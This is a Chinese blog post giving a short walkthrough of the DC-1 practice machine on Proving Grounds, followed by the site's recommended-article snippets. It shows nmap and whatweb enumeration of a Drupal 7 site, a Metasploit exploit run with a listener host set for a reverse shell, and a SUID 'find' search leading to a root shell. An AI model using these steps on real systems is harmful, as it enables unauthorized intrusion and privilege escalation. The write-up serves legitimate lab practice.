DC-1 | Easy-Easy Proving Grounds Play

最新推荐文章于 2024-08-14 14:06:34 发布
最新推荐文章于 2024-08-14 14:06:34 发布
阅读量182 收藏
点赞数
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AKAHRZ/article/details/130455411
版权

DC-1 | Easy-Easy

一、枚举/信息搜集

首先,常规nmap扫描

nmap -p- -A $IP

简单分析下扫描结果,其中开放了22、80、111、40238端口,看起来好像没有什么突破点,但是我们能发现80端口上的信息比较多,那我们直接搞起来

这里能看出来网站的默认CMS为Drupal,再开whatweb扫描

版本号为7,很舒服,那这里就有两个思路,要么找公开漏洞或msf一把梭,没时间废话,直接一把梭

二、权限获取

msf搜一下,这里我们用第一个(use 1)

options //查看需要的设置
set RHOSTS $ip //设置目标
set LHOST $ip //设置监听
run //跑起来

三、权限提升

构造搜寻有sudo命令的内容:

find / -perm -u=s -type f 2>/dev/null

这里找到了find命令,送分局了属于是,GTFO梭

Root shell get

四、复盘

很简单,没得说,之后将日更一段时间打靶内容,oscp向,可以来一波,一起打靶:Day1:Empire-breakout | Easy-Hard Proving ground play

AKA航仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OffSec Labs Proving grounds Play——Gaara
algae
08-12 660
[Gaara: 1 ~ VulnHub](https://www.vulnhub.com/entry/gaara-1,629/) writeup walkthrough Enumeration Enumerate the web application for a username. Foothold Brute-force the SSH service. You can get away with a smaller wordlist if it's the right one. Privile
OffSec Labs Proving grounds Play——FunboxEasyEnum
algae
08-12 691
FunboxEasyEnum writeup walkthrough [Funbox: EasyEnum ~ VulnHub](https://www.vulnhub.com/entry/funbox-easyenum,565/) **Enumeration** Brute-force the web server's files and directories. Be sure to check for common file extensions. **Remote Code Execution
Empire-breakout | Easy-Hard Proving ground play
AKAHRZ的博客
04-30 198
首先,我们使用NMAP进行信息搜集,使用全端口的扫描可能比较消耗时间,但是不会有所遗漏分析下我们的扫描结果,该盒子一共开了三个端口,80、10000、20000,很明显这个靶场需要我们从web页面打进去先看一下默认的80端口网站,是一个apache默认页面下意识访问网站页面源代码,看到了一段可疑的加密密文,如果熟悉Crypto题目的话可以很明显看出是Brainfuck加密进行解密后,结果如下,我们对解密后的结果进行保存,分析可能为后面的某个用户的密码。
ZK-SNARKS | 创建第一个零知识snark电路
Welcome to Simmel's Garden
08-09 2467
前言:本文我们使用两个公开库circom、snarkjs尝试构建一个简单的零知识证明。其中,circom库(github链接)用于构建和编译代数电路,snarkjs库(github链接)是zk-snarks协议的独立实现。 目录 准备:安装Node.js 1. 安装circom&snarkjs 2. 构建电路 2.1 设计电路 准备:安装Node.js 具体方法参考我的另一篇博文。 1. 安装circom&snarkjs 在终端输入如下安装命令: np...
ProvingGround:Proving Ground:自动化数学工具
02-05
试验场,试验场所试验场:自动化数学工具一个正在开发的用于(半)自动定理证明的系统,其基础是同伦类型理论,使用机器学习,既可以通过向后传播进行强化学习,也可以使用自然语言处理来吸收部分数学文献。...
Coq-Polyhedra:在Coq中将凸多面体形式化
03-30
Coq-Polyhedra ...其中$ OVERSION是有效的OCaml版本(例如4.07.1) 添加Coq存储库: $> opam repo add coq-released https://coq.inria.fr/opam/released $> opam repo add coq-core-dev https://co
HOL theorem-proving system-开源
04-28
1. **定义概念**:用户首先需要定义要工作的基本概念,这可能包括新的类型、函数和谓词。 2. **构建理论**:基于这些概念,用户可以构建理论,即一系列相关的定理和公理。这些理论可以逐步扩展,形成复杂的数学结构...
3d Proving Ground-开源
05-09
《3D Proving Ground:一个开源的Java3D粒子引擎》 在计算机图形学的世界里,粒子系统是一种广泛用于模拟复杂动态效果的技术,如火、烟雾、水、爆炸等。"3D Proving Ground"项目就是这样一个专注于开发Java3D可视化...
The Complexity of Theorem-Proving Procedures
05-07
It is shown that any recognition problem solved by a polynomial time-bounded nondeterministic Turing machine can be “reduced” to the problem of determining whether a given propositional formula is a...
服务器数据恢复—raid5阵列热备盘未全部启用导致阵列崩溃的数据恢复案例
beiya123的博客
08-14 163
服务器存储数据恢复环境: 一台EMC某型号存储中有一组RAID5磁盘阵列。该raid5阵列中有12块硬盘,其中2块硬盘为热备盘。 服务器存储故障: 该存储raid5阵列中有两块硬盘离线,只有1块热备盘启用替换掉其中一块离线盘,另外1块热备盘未成功启用,raid5阵列崩溃,存储不可用。 磁盘阵列中硬盘离线的原因通常是磁盘存在物理故障或者硬盘出现坏道。由于EMC存储中的raid控制器的磁盘检查策略十分严格,经常将硬盘的性能不稳定判定为硬件故障并将该硬盘踢出raid。
市场解读│AI服务器市场爆发 磁性元件的下一个风口已至?
bigbit_LiLi的博客
08-09 1011
面对AI服务器这一新兴市场的蓬勃发展,磁性元件企业应当敏锐地把握这一历史机遇,积极调整产品策略,加大研发投入,以满足AI服务器对高频、耐高温、低功耗以及小型化等高性能磁性元件的迫切需求。而这一切的背后,都离不开强大的计算支持——AI服务器。Big-Bit产业研究室据此预测,随着AI服务器市场的持续扩张,磁性元件行业的市场增量将极为可观,为相关企业带来广阔的发展空间和丰厚的利润回报。随着AI技术的不断成熟和应用场景的日益丰富,AI服务器市场正步入其发展的黄金时期,带给磁性元件行业企业前所未有的机遇与挑战。
将A服务器上指定文件夹中的文件,批量同步到B服务器
最新发布
大数据-攻城狮
08-14 125
【代码】将A服务器上指定文件夹中的文件,批量同步到B服务器上。
SaaS系统如何选择合适的服务器
qq177803623的博客
08-14 313
服务器:考虑使用云服务器(如AWS、Azure、Google Cloud等),它们提供灵活的付费模型和弹性扩展功能,可以根据实际需求动态调整服务器的配置和数量。高可用性和冗余配置:选择具有高可用性和冗余配置的服务器,如具有热备份和冗余电源的服务器,以及支持自动故障转移和备份功能的服务器集群。内存(RAM):确保服务器有足够的内存来存储系统运行时所需的数据和变量,内存大小应根据系统的规模和预期的并发用户数进行选择。防火墙和入侵检测:选择具有强大防火墙和入侵检测功能的服务器,以防止未经授权的访问和数据泄露。
超融合一体机是服务器吗?与服务器有什么区别
petaexpress的博客
08-14 191
超融合一体机不是单纯的服务器,它是一种基于超融合技术构建的IT基础设施解决方案,集成了软件和硬件,提供计算、存储和网络功能。这种一体机不仅简化了数据中心的部署、扩展和管理,还提供了高可用性、高性能的数据中心解决方案。
【nginx 第一篇章】认识一下 NGINX 服务器
Tsing
08-10 1022
Nginx (engine x) 是一个高性能的 HTTP 和反向代理服务器,也是一个 IMAP/POP3/SMTP 代理服务器。由俄罗斯程序员 Igor Sysoev 开发,并在2004年首次公开发布。Nginx 以其高并发处理能力、低内存消耗、稳定性、丰富的功能集、简单的配置以及低学习曲线而广受欢迎。Nginx 通常被用作 Web 服务器来托管网站,但也可以有效地用作反向代理、负载均衡器和 HTTP 缓存。
Linux 基本指令讲解 上
Mike的博客
08-13 1621
clear清屏Alt Enter全屏/退出全屏pwd显示当前用户所处路径cd改变目录mkdir创建一个文件夹(d)rmdir默认只能删除空文件夹(空目录)ls显示当前目录下的文件,ls 默认只会显示文件名这个属性。可以是 0 个或多个,多个选项都是用空格分隔whoami输出当前用户是谁touchrm删除文件cp拷贝命令tree以树形输出路径which输出文件的路径alias给其他命令起别名,但都是临时的,当重启后就会恢复。
Linux 内核源码分析---传输层分析
学习记录
08-14 619
学习记录
NFS实现多服务器文件的共享
秃了也弱了
08-14 651
NFS是network file sytem的缩写,它允许网络中的计算机之间共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。因为NFS服务有很多功能,提供不同功能的进程使用的端口号也就会各不相同,如果客户端想要请求NFS服务器的某项功能,势必需要先知道其功能的目的端口号,才能从NFS服务器哪里获得服务。那么NFS服务这么多功能端口号,客户端如何知道NFS服务器的某项功能使用的什么端口号呢?
"ATX电源智能检测仪设计-毕业论文
Finally, the feasibility and effectiveness of the design are verified through experiments, proving the application potential of intelligent detection instrument in ATX power supply. Key words: ATX ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值